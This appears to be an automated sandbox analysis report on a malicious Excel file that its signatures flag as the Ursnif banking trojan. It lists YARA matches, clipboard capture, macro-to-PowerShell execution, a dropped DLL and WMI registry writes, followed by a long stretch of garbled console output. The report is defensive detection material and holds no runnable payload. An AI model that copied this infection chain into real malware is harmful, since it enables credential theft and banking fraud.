Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49220
Source: unknownNetwork traffic detected: HTTP traffic on port 49232 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49233 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 0000000E.00000002.2640661969.029B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000008.00000003.2525298573.0259C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000008.00000003.2517600435.02798000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2248, type: MEMORY
Contains functionality for read data from the clipboardShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_0045593F CreateEventA,StrChrW,WaitForSingleObject,OpenClipboard,GetClipboardData,CloseClipboard,CloseHandle,GetCurrentProcessId,wsprintfW,OpenFileMappingW,MapViewOfFile,CloseHandle,8_2_0045593F
Contains functionality to read the clipboard dataShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_0045593F CreateEventA,StrChrW,WaitForSingleObject,OpenClipboard,GetClipboardData,CloseClipboard,CloseHandle,GetCurrentProcessId,wsprintfW,OpenFileMappingW,MapViewOfFile,CloseHandle,8_2_0045593F
Creates a window with clipboard capturing capabilitiesShow sources
Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 0000000E.00000002.2640661969.029B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000008.00000003.2525298573.0259C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000008.00000003.2517600435.02798000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2248, type: MEMORY
Drops certificate files (DER)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15AJump to dropped file

System Summary:

barindex
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\WJump to dropped file
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 4452
Source: unknownProcess created: Commandline size = 4415
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: Commandline size = 4452Jump to behavior
Writes registry values via WMIShow sources
Source: C:\Windows\System32\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\System32\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\System32\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\System32\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\System32\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\System32\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\System32\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\System32\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\System32\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Contains functionality to call native functionsShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_0045309E NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,8_2_0045309E
Detected potential crypto functionShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00454A818_2_00454A81
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_0045A1908_2_0045A190
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: MIL0001742828.xlsOLE, VBA macro line: Private Sub Notifica_Layout()
Source: VBA code instrumentationOLE, VBA macro: Module Foglio1, Function Notifica_LayoutName: Notifica_Layout
Document contains embedded VBA macrosShow sources
Source: MIL0001742828.xlsOLE indicator, VBA macros: true
PE file does not import any functionsShow sources
Source: ygdsonvv.dll.23.drStatic PE information: No import functions for PE file found
Searches for the Microsoft Outlook file pathShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Yara signature matchShow sources
Source: 00000002.00000003.2070939440.000CF000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000003.2072821354.000DC000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.2073703270.00070000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.2073869879.00270000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.2073914205.011BD000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.2073902999.004B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.2073755839.000DD000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000003.2072909615.014E2000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Classification labelShow sources
Source: classification engineClassification label: mal100.bank.troj.expl.evad.winXLS@37/56@16/4
Contains functionality to instantiate COM classesShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_004556C7 CoCreateInstance,ObjectStublessClient9,IUnknown_QueryService,IUnknown_QueryService,ObjectStublessClient9,8_2_004556C7
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{1CE5CAFC-CBBD-AE78-3510-2FC23944D316}
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user~1\AppData\Local\Temp\CVRA72D.tmpJump to behavior
Document contains an OLE Workbook stream indicating a Microsoft Excel fileShow sources
Source: MIL0001742828.xlsOLE indicator, Workbook stream: true
Found command line outputShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........3Jnp...#........3Jn.....=2.L|In......ak 'On..aks{..L|InH............7Jn......In.=2...D............. 'On..In....Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................#.....D.\......w...................w..0.....l...t...8.......................#...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x......./.....D........wx..................w..0.....l...t...8...G.................../...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................/.....D.\......w...................w..0.....l...t...8...b.................../...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......;.....D........wx..................w..0.....l...t...8.......................;...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................;.....D.\......w...................w..0.....l...t...8.......................;...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......G...A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.3.2.7...l...t...8.......................G.......X...&...>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................G.....D.\......w...................w..0.....l...t...8.......................G...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......S.....D........wx..................w..0.....l...t...8.......................S...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................S.....D.\......w...................w..0.....l...t...8...4...................S...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x......._.....D........wx..................w..0.....l...t...8...\..................._...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................_.....D.\......w...................w..0.....l...t...8...w..................._...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......k.....D........wx..................w..0.....l...t...8.......................k...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................k.....D.\......w...................w..0.....l...t...8.......................k...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......w.....D........wx..................w..0.....l...t...8.......................w...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................w.....D.\......w...................w..0.....l...t...8.......................w...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8...%...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8...@...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8...j...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8...3...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8...N...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8...v...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8...@...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8...[...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8...%...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8...M...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8...h...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......+.....D........wx..................w..0.....l...t...8.......................+...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................+.....D.\......w...................w..0.....l...t...8.......................+...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......7.....D........wx..................w..0.....l...t...8.......................7...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................7.....D.\......w...................w..0.....l...t...8...2...................7...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......C.....D........wx..................w..0.....l...t...8...Z...................C...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................C.....D.\......w...................w..0.....l...t...8...u...................C...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......O.....D........wx..................w..0.....l...t...8.......................O...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................O.....D.\......w...................w..0.....l...t...8.......................O...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......[.....D........wx..................w..0.....l...t...8.......................[...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................[.....D.\......w...................w..0.....l...t...8.......................[...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......g.....D........wx..................w..0.....l...t...8...,...................g...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................g.....D.\......w...................w..0.....l...t...8...G...................g...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......s.....D........wx..................w..0.....l...t...8...o...................s...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................s.....D.\......w...................w..0.....l...t...8.......................s...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8...F...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8...a...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8...*...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8...R...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8...m...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8...7...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8..._...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8...z...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8...(...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8...C...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......'.....D........wx..................w..0.....l...t...8...k...................'...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................'.....D.\......w...................w..0.....l...t...8.......................'...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......3.....D........wx..................w..0.....l...t...8.......................3...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................3.....D.\......w...................w..0.....l...t...8.......................3...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......?.....D........wx..................w..0.....l...t...8.......................?...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................?.....D.\......w...................w..0.....l...t...8.......................?...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......K.....D........wx..................w..0.....l...t...8...?...................K...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................K.....D.\......w...................w..0.....l...t...8...Z...................K...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......W.....D........wx..................w..0.....l...t...8.......................W...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................W.....D.\......w...................w..0.....l...t...8.......................W...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......c.....D........wx..................w..0.....l...t...8.......................c...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................c.....D.\......w...................w..0.....l...t...8.......................c...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......o.....D........wx..................w..0.....l...t...8.......................o...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................o.....D.\......w...................w..0.....l...t...8...#...................o...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......{.....D........wx..................w..0.....l...t...8...K...................{...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................{.....D.\......w...................w..0.....l...t...8...f...................{...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.../...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8...W...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8...r...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8... ...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8...;...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8...e...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x........... .'.t.'.,.'.o.n.'.,.'.V.i.t.'.)...0.....l...t...8...1...........................X... ...>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8...L...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8...t...................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.............D........wx..................w..0.....l...t...8...................................f...>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......#... .D........wx..................w..0.....l...t...8.......................#.......X.......>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................#.....D.\......w...................w..0.....l...t...8.......................#...............>..w........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.................V+.........................._...........!...@@ ...&.u.....&.....\....F%J......&.
Source: C:\Windows\System32\cmd.exeConsole Write: ....................A.c.c.e.s.s. .i.s. .d.e.n.i.e.d...........&.X.+.....V.#J..............&.....#..w..&.&...`.....,.....
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
